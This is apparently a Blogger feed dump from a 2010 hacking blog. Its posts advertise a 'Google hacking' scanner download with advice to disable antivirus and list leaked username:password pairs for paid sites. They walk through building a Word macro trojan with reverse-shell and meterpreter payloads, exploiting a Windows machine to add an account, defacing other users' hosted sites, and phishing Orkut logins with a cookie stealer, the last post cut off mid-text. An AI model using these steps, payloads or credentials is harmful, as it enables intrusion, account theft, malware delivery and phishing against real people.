href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWVt7niU73LzJLGO6TfkstbBcQD-AkrvUQ5JMCRrTwhlPlWfWuRzDKyC7WK0FmymMWmgZ3e0BdGuyXBvNJvfS40JJE0Hh8kOhfE6npjwKCxolpNPSlwaK-9U2IjPIK9hOHK5qiUjcBQWM/s1600/goolag-scanner.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="335" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWVt7niU73LzJLGO6TfkstbBcQD-AkrvUQ5JMCRrTwhlPlWfWuRzDKyC7WK0FmymMWmgZ3e0BdGuyXBvNJvfS40JJE0Hh8kOhfE6npjwKCxolpNPSlwaK-9U2IjPIK9hOHK5qiUjcBQWM/s400/goolag-scanner.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
Goolag Scanner is an automated "Google hacking" application that has been banned by google.  This Scanner was itself used by the google employees to find website vulnerabilites. As this great software was leaked out by hackers google banned it from further use. Google hacking is a form of Web site auditing that takes advantage of "dorks," or extended search queries, that look for very specific kinds of data (credit card information, mp3 files, passwords, IP configuration data, etc.). &lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;There are approximately 1500 dorks in circulation.  Goolag Scanner searches whatever it is asked to search:  a specific Web site, or a vast network.  It will do whatever it is asked to do.  And then it will return the results.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* There is no need for a special tool to use dorks other than a browser, but scanning hundreds of dorks ‘by hand’ is impossible.&lt;br /&gt;
* Goolag Scanner is focused on usability. It simplifies the use of myriad numbers of dorks to a few mouse clicks. No cryptic command line options and no knowledge of Google hacking are required to test one’s host.&lt;br /&gt;
* Goolag Scanner comes with its own dorks-database, but it is not limited to such.&lt;br /&gt;
* gS uses a very simple xml-document, which is readable and part of the distribution.&lt;br /&gt;
&lt;br /&gt;
* Searches a specific site for vulnerablities.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
REQUIREMENT:&lt;br /&gt;
* This software requires Microsoft .NET Framework Version 2.0 or higher.&lt;br /&gt;
*A proxy server or a VPN. (Dont use your own IP. Google may ban your IP address).&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;NOTE: ITS NOT A VIRUS. YOUR ANTI VIRUS MAY DETECT IT AS A VIRUS. DISABLE YOUR ANTI VIRUS BEFORE INSTALLING. ALSO DISABLE UR ANTI VIRUS WHEN U R USING IT&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;DOWNLOAD:&lt;/b&gt;&lt;br /&gt;
&lt;a class="fontfamilyverdana normal12bluebold" href="http://www.ziddu.com/download/8583382/GS1.0.0.40OfficialRelease.rar.html"&gt;http://www.ziddu.com/download/8583382/GS1.0.0.40OfficialRelease.rar.html&lt;/a&gt;</content><link href="http://i-xploit.blogspot.com/feeds/8659219472769866156/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/goolag-google-database-scanner.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/8659219472769866156" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/8659219472769866156" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/goolag-google-database-scanner.html" rel="alternate" title="Goolag: Google Database Scanner" type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjWVt7niU73LzJLGO6TfkstbBcQD-AkrvUQ5JMCRrTwhlPlWfWuRzDKyC7WK0FmymMWmgZ3e0BdGuyXBvNJvfS40JJE0Hh8kOhfE6npjwKCxolpNPSlwaK-9U2IjPIK9hOHK5qiUjcBQWM/s72-c/goolag-scanner.jpg" width="72"/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-2458779177687055812</id><published>2010-02-17T11:57:00.000+05:30</published><updated>2010-02-17T11:57:29.047+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Tricks"/><title type="text">How To Find Free Porn Passes</title><content type="html">First let me say that this won't work for every site and people have  probably already heard of this but just in case not here's how you do it  &lt;br /&gt;
&lt;br /&gt;
1. go to google.com&lt;br /&gt;
&lt;br /&gt;
2. type this (with the quotes) "@members.&lt;pornsite&gt;.com" replace  &lt;pornsite&gt; with whatever site you want passwords for &lt;br /&gt;
e.g. "@members.bangbros.com"&lt;/pornsite&gt;&lt;/pornsite&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
3. click on the option that says "latest"&lt;br /&gt;
&lt;br /&gt;
4. you should see search results with urls like this  http://&lt;usename&gt;:&lt;password&gt;@members.bangbros.com&lt;br /&gt;
where &lt;username&gt; is the username for the account and  &lt;password&gt; is the password for the account&lt;br /&gt;
e.g.  http://pornwatcher43:imaperv@bangbros.com&lt;br /&gt;
&lt;br /&gt;
5. go to the sites login page and enter the user name and password you  got in step 4 &lt;br /&gt;
&amp;nbsp;&lt;/password&gt;&lt;/username&gt;&lt;/password&gt;&lt;/usename&gt;&lt;br /&gt;
6. yay free pay porn&lt;br /&gt;
&lt;br /&gt;
SOME PASSES WHICH I FOUND:::&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
BANGBROS PASSES!!!&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://bparker333:8124333@members.bangbros.com/" target="_blank"&gt;http://bparker333:8124333@members.bangbros.com/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://redhead69:hotrod@members.bangbros.com/" target="_blank"&gt;http://redhead69:hotrod@members.bangbros.com/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://reverd:newman@members.bangbros.com/" target="_blank"&gt;http://reverd:newman@members.bangbros.com/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://frg129:52hall@members.bangbros.com/" target="_blank"&gt;http://frg129:52hall@members.bangbros.com/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://Kandahar07:Khafji1991@members.bangbros.com/" target="_blank"&gt;http://Kandahar07:Khafji1991@members.bangbros.com/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://genejazz:jazzgene@members.bangbrosnetwork.com/" target="_blank"&gt;http://genejazz:jazzgene@members.bangbrosnetwork.com/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://mancat11:tcat11@members.bangbrosnetwork.com/" target="_blank"&gt;http://mancat11:tcat11@members.bangbrosnetwork.com/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://beauj187:b1bomber@members.bangbrosnetwork.com/" target="_blank"&gt;http://beauj187:b1bomber@members.bangbrosnetwork.com/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://wade1152:gotthe12@members.bangbrosnetwork.com/" target="_blank"&gt;http://wade1152:gotthe12@members.bangbrosnetwork.com/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://ppalomin:2628412@beta.bangbros.com/" target="_blank"&gt;http://ppalomin:2628412@beta.bangbros.com/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://wsdoyle:doodie@beta.bangbros.com/" target="_blank"&gt;http://wsdoyle:doodie@beta.bangbros.com/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://sn4r3m1k3:gohan1@beta.bangbros.com/" target="_blank"&gt;http://sn4r3m1k3:gohan1@beta.bangbros.com/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://sethikeda:chaos1@beta.bangbros.com/" target="_blank"&gt;http://sethikeda:chaos1@beta.bangbros.com/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://luciano:arianna@beta.bangbros.com/" target="_blank"&gt;http://luciano:arianna@beta.bangbros.com/&lt;/a&gt;&lt;br /&gt;
&lt;a href="http://JABLABALA:FINKLE@beta.bangbros.com/" target="_blank"&gt;http://JABLABALA:FINKLE@beta.bangbros.com/&lt;/a&gt;</content><link href="http://i-xploit.blogspot.com/feeds/2458779177687055812/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/how-to-find-free-porn-passes.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/2458779177687055812" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/2458779177687055812" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/how-to-find-free-porn-passes.html" rel="alternate" title="How To Find Free Porn Passes" type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-2230108188984442002</id><published>2010-02-09T12:40:00.000+05:30</published><updated>2010-02-26T23:08:37.998+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><title type="text">Make a MS Word Trojan</title><content type="html">Anyway this is how you can use metasploit to make a vbs reverse meterpreter payload and import it into a Microsoft Word as a macro. It's super easy.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
download and install metasploit&lt;br /&gt;
&lt;a href="http://www.metasploit.com/"&gt;http://www.metasploit.com/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
-----------------------------------------------------------------&lt;br /&gt;
Ok first we create the payload with msfpayload&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Windows:&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Start&amp;gt;All Programs&amp;gt;Metasploit 3&amp;gt;CMD Shell&lt;br /&gt;
&amp;nbsp;&lt;br /&gt;
ruby msfpayload windows/shell_reverse_tcp LHOST=your_ip LPORT=4444 V &amp;gt; C:\evil.bas&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Linux:&amp;nbsp;&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
./msfpayload windows/meterpreter/reverse_tcp LHOST=your_ip LPORT=4444 V &amp;gt; evil.bas&lt;br /&gt;
&lt;br /&gt;
-----------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
Open up an new word document in word 2003.&lt;br /&gt;
&lt;br /&gt;
Go tools&amp;gt;macro&amp;gt;Visual Basic editor&lt;br /&gt;
&lt;br /&gt;
File&amp;gt;Import File&lt;br /&gt;
&lt;br /&gt;
now select your evil.bas file.&lt;br /&gt;
&lt;br /&gt;
File&amp;gt;Save Normal&lt;br /&gt;
&lt;br /&gt;
File&amp;gt;Close and Return to Microsoft Word&lt;br /&gt;
&lt;br /&gt;
Save it.&lt;br /&gt;
&lt;br /&gt;
-----------------------------------------------------------------&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Windows:&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
Download netcat from here &lt;a href="http://webscripts.softpedia.com/script/Networking-Tools/Netcat-27515.html"&gt;http://webscripts.softpedia.com/script/Networking-Tools/Netcat-27515.html&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
open up cmd&lt;br /&gt;
&lt;br /&gt;
nc.exe -l -p 4444 -v&lt;br /&gt;
&lt;br /&gt;
&lt;strong&gt;Linux:&lt;/strong&gt;&lt;br /&gt;
&lt;br /&gt;
set up a listener with metasploit&lt;br /&gt;
&lt;br /&gt;
msfconsole&lt;br /&gt;
&lt;br /&gt;
use exploit/multi/handler&lt;br /&gt;
&lt;br /&gt;
set PAYLOAD windows/meterpreter/reverse_tcp&lt;br /&gt;
&lt;br /&gt;
set LPORT 4444&lt;br /&gt;
&lt;br /&gt;
set LHOST your_ip&lt;br /&gt;
&lt;br /&gt;
exploit&lt;br /&gt;
&lt;br /&gt;
-----------------------------------------------------------------&lt;br /&gt;
Then open the word document on another pc and you will get a meterpreter session.&lt;br /&gt;
&lt;br /&gt;
You can now use meterpreter's upload and execute commands to upload and run your perfered rat/keylogger/bot on the target machine.&lt;br /&gt;
-----------------------------------------------------------------</content><link href="http://i-xploit.blogspot.com/feeds/2230108188984442002/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/make-ms-word-trojan.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/2230108188984442002" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/2230108188984442002" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/make-ms-word-trojan.html" rel="alternate" title="Make a MS Word Trojan" type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-5832937492205656218</id><published>2010-02-06T15:45:00.003+05:30</published><updated>2010-02-06T16:04:07.868+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="Hacking"/><title type="text">Easy Hacking using Metasploit</title><content type="html">Today,I am going to make a tutorial on &lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;Metasploit&lt;/span&gt;.&lt;br /&gt;
&lt;br /&gt;
It is a great tool and it can be downloaded from:&lt;br /&gt;
&lt;a href="http://www.metasploit.com/" linkindex="224" target="_blank"&gt;http://www.&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;metasploit&lt;/span&gt;.com/&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
The best thing is it is available for everyone for free.&lt;br /&gt;
&lt;br /&gt;
It is very easy to use and I am going to show you now.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Scenario:&lt;br /&gt;
** I am demonstrating this in my security lab&lt;br /&gt;
** The attacker computer will be 192.168.1.9 (Linux Backtrack 4)&lt;br /&gt;
** The victim computer will be 192.168.1.10 &lt;br /&gt;
&lt;br /&gt;
First of all,open up Metaploit&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://a.imagehost.org/0808/1_44.jpg" imageanchor="1" linkindex="225" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://a.imagehost.org/0808/1_44.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;This is the interface of &lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;Metasploit&lt;/span&gt; and it is ready for you to insert the command.&lt;br /&gt;
&lt;br /&gt;
The first command that will be entered to the shell is &lt;br /&gt;
** show exploits&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://a.imagehost.org/0995/2_16.jpg" imageanchor="1" linkindex="226" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://a.imagehost.org/0995/2_16.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Basically,this command will show all the exploits that can be used by the attacker.&lt;br /&gt;
&lt;br /&gt;
Press ENTER and all the exploits will be shown to the attacker.&lt;br /&gt;
&lt;br /&gt;
Now,the attacker is going to choose the exploit.&lt;br /&gt;
&lt;br /&gt;
In this case,the attacker will use ms05_039_pnp exploit.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://a.imagehost.org/0513/4_13.jpg" imageanchor="1" linkindex="227" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://a.imagehost.org/0513/4_13.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The command to use the exploit is &lt;br /&gt;
** use ms_035_pnp&lt;br /&gt;
&lt;br /&gt;
Press ENTER and the exploit will be used.&lt;br /&gt;
&lt;br /&gt;
Now,we are going to see what the exploit can do for the attacker.&lt;br /&gt;
&lt;br /&gt;
The attacker will now issues this command&lt;br /&gt;
** show payloads&lt;br /&gt;
&lt;br /&gt;
Press on ENTER and all the payloads will be shown to the attacker.&lt;br /&gt;
&lt;br /&gt;
In this case,the attacker is going to add an user to the victim computer.&lt;br /&gt;
&lt;br /&gt;
The command that will be issues is&lt;br /&gt;
** set payload windows/adduser&lt;br /&gt;
&lt;br /&gt;
Press on ENTER and that payload will be used.&lt;br /&gt;
&lt;br /&gt;
The next thing that the attacker needs to do is set the target.&lt;br /&gt;
&lt;br /&gt;
The attacker now needs to issues this command to see the target list&lt;br /&gt;
** show targets&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://a.imagehost.org/0318/7_3.jpg" imageanchor="1" linkindex="228" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://a.imagehost.org/0318/7_3.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
After the attacker has determine the target,the next thing is to set the target.&lt;br /&gt;
&lt;br /&gt;
The command that can be used is &lt;br /&gt;
** set target 0&lt;br /&gt;
&lt;br /&gt;
The number will be according to the victim operating system.&lt;br /&gt;
&lt;br /&gt;
The next steps will be show the fields that need to fill up by the attacker.&lt;br /&gt;
&lt;br /&gt;
The command will be&lt;br /&gt;
** show options&lt;br /&gt;
&lt;br /&gt;
There will be empty fields that need to be filled by the attacker.&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://a.imagehost.org/0302/10_8.jpg" imageanchor="1" linkindex="229" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://a.imagehost.org/0302/10_8.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
In this case,the empty fields are RHOST and PASS.&lt;br /&gt;
&lt;br /&gt;
RHOST stands for Remote Host (victim IP address).&lt;br /&gt;
&lt;br /&gt;
PASS stands for Password.&lt;br /&gt;
&lt;br /&gt;
To set both of them,the commands are&lt;br /&gt;
** set RHOST 192.168.1.10&lt;br /&gt;
** set PASS 12345&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://a.imagehost.org/0837/11_2.jpg" imageanchor="1" linkindex="230" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://a.imagehost.org/0837/11_2.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;/div&gt;The attacker is setting remote host.&lt;br /&gt;
&lt;br /&gt;
The attacker is setting Password.&lt;br /&gt;
&lt;br /&gt;
Finally,the last command that need to be used is&lt;br /&gt;
** exploit&lt;br /&gt;
&lt;br /&gt;
The exploit command will call &lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;Metasploit&lt;/span&gt; to launch the attack to the victim.&lt;br /&gt;
&lt;br /&gt;
Press ENTER and &lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;Metasploit&lt;/span&gt; will launch the attack.&lt;br /&gt;
&lt;br /&gt;
Now the attacker know that he has an account at the victim machine.&lt;br /&gt;
&lt;br /&gt;
Account information:&lt;br /&gt;
username = &lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;Metasploit&lt;/span&gt;&lt;br /&gt;
password = 12345&lt;br /&gt;
&lt;br /&gt;
Now it is the time for the attacker to enter the victim machine.&lt;br /&gt;
&lt;br /&gt;
The attacker will open up a RUN box.&lt;br /&gt;
&lt;br /&gt;
In the RUN box,the attacker will type in&lt;br /&gt;
** \\192.168.1.10\c$&lt;br /&gt;
&amp;nbsp; &lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://a.imagehost.org/0896/16.jpg" imageanchor="1" linkindex="231" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="262" src="http://a.imagehost.org/0896/16.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;Press ENTER and a login prompt will pop up.&lt;br /&gt;
&lt;br /&gt;
Attacker needs to enter the username and password for the victim machine.&lt;br /&gt;
&lt;br /&gt;
In this case,the username and password are &lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;Metasploit&lt;/span&gt; and 12345.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://a.imagehost.org/0793/18_6.jpg" imageanchor="1" linkindex="232" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="380" src="http://a.imagehost.org/0793/18_6.jpg" width="640" /&gt;&lt;/a&gt;&lt;/div&gt;Press ENTER and the attacker is in the victim machine.&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://a.imagehost.org/0182/19_4.jpg" imageanchor="1" linkindex="233" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://a.imagehost.org/0182/19_4.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
The above picture shows that the attacker is in the C drive of victim machine.&lt;br /&gt;
&lt;br /&gt;
What can a victim see on his machine?&lt;br /&gt;
&lt;br /&gt;
If the victim launch a Command Prompt and type in&lt;br /&gt;
** net user&lt;br /&gt;
&lt;br /&gt;
The result will be&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;&lt;a href="http://a.imagehost.org/0036/2_4.jpg" imageanchor="1" linkindex="234" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://a.imagehost.org/0036/2_4.jpg" /&gt;&lt;/a&gt;&lt;/div&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Do you see that?&lt;br /&gt;
&lt;br /&gt;
The username "&lt;span class="highlight" style="padding-left: 0px; padding-right: 0px;"&gt;metasploit&lt;/span&gt;" is there.&lt;br /&gt;
&lt;br /&gt;
That is the username that the attacker created.&lt;br /&gt;
&lt;br /&gt;
The commands that I used:&lt;br /&gt;
** show exploits&lt;br /&gt;
** use EXPLOITNAME&lt;br /&gt;
** show payloads&lt;br /&gt;
** set payload PAYLOADNAME&lt;br /&gt;
** show targets&lt;br /&gt;
** set target TARGETNUMBER&lt;br /&gt;
** show options&lt;br /&gt;
** set RHOST IPADDRESS&lt;br /&gt;
** exploit&lt;br /&gt;
&lt;br /&gt;
Imagine that you are in the Cafe drinking coffee and using laptop.&lt;br /&gt;
The attacker is around you and attacks your computer.&lt;br /&gt;
The attacker can does anything he wants when he is in the C drive.&lt;br /&gt;
&lt;br /&gt;
The solution will be patching your operating system with the latest security hot-fix from the vendor.&lt;br /&gt;
&lt;br /&gt;
I will end my tutorial here.&lt;br /&gt;
&lt;br /&gt;
Hope you will like it and feel free to comment.</content><link href="http://i-xploit.blogspot.com/feeds/5832937492205656218/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/easy-hacking-using-metasploit.html#comment-form" rel="replies" title="0 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/5832937492205656218" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/5832937492205656218" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/easy-hacking-using-metasploit.html" rel="alternate" title="Easy Hacking using Metasploit" type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-5355182906333842035</id><published>2010-02-02T11:52:00.000+05:30</published><updated>2010-02-02T11:52:32.919+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="PHP"/><title type="text">Hacking hosting sites using PHP Jackal</title><content type="html">&lt;pre&gt;&lt;/pre&gt;&lt;pre&gt;Download PHP Jackal From Here

&lt;a class="normal12blue" href="http://www.ziddu.com/download/8407467/PHPJackal.zip.html"&gt;http://www.ziddu.com/download/8407467/PHPJackal.zip.html&lt;/a&gt;
extract files

Upload It On Your host Like If u Wanna Hack A justfree Page Upload it On Your JustFree Account or you want to hack my3gb so upload in my3gb
&lt;a name='more'&gt;&lt;/a&gt;
Open It

Click On PHP Jackal.php

AFter That Go To PHP jackal's File Manager!Now If You Want To Hack A Page
See His Link
Example :- www.samuraitools.my3gb.com
Copy The Username From The Link
www.samuraitools.my3gb.com Username is : samuraitools
Copy And Paste smuraitools in location and click on change

/jotun1/my3gb.com/y/o/u/victim username /htdocs

Edit The /jotun1/my3gb.com/y/o/u/samuraitools/htdocs

Write The First 3 Letters Of The Username In The Slashes
So The New Code Will Be
/jotun1/my3gb.com/s/a/m/samuraitools/htdocs
Hit Enter
Your Done

You Will Be At His File Manager
Enjoy

find his index.html file and go to action and delete it and upload your index file
or edit index.html and replace with your index source coadings

and you have done
his account is hacked if you want so you can download his flies in your computer also&lt;/pre&gt;</content><link href="http://i-xploit.blogspot.com/feeds/5355182906333842035/comments/default" rel="replies" title="Post Comments" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/hacking-hosting-sites-using-php-jackal.html#comment-form" rel="replies" title="1 Comments" type="text/html"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/5355182906333842035" rel="edit" type="application/atom+xml"/><link href="http://www.blogger.com/feeds/4293538220121388026/posts/default/5355182906333842035" rel="self" type="application/atom+xml"/><link href="http://i-xploit.blogspot.com/2010/02/hacking-hosting-sites-using-php-jackal.html" rel="alternate" title="Hacking hosting sites using PHP Jackal" type="text/html"/><author><name>Unknown</name><email>noreply@blogger.com</email><gd:image height="16" rel="http://schemas.google.com/g/2005#thumbnail" src="https://img1.blogblog.com/img/b16-rounded.gif" width="16"/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4293538220121388026.post-8286297806389477850</id><published>2010-02-02T11:38:00.001+05:30</published><updated>2010-02-02T11:39:53.685+05:30</updated><category scheme="http://www.blogger.com/atom/ns#" term="PHP"/><title type="text">Cookie Stealer In Fake Page</title><content type="html">Use This Run.&lt;span style="background-color: white;"&gt;php &lt;/span&gt;File In Fake Page&lt;br /&gt;
&lt;br /&gt;
&lt;a href="http://www.freeuploading.com/files/_5JDnx1/run_php.php" target="_blank"&gt;                                 &lt;/a&gt;&lt;a class="fontfamilyverdana normal12bluebold" href="http://www.ziddu.com/download/8407239/Run.rar.html"&gt;http://www.ziddu.com/download/8407239/Run.rar.html&lt;/a&gt;&lt;br /&gt;
&lt;br /&gt;
And The Cookie And Login Details Will BE Saved In ld.txt&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
Copy the whole source code of the Login Page Of Orkut.Paste In Notepad&lt;br /&gt;
&lt;br /&gt;
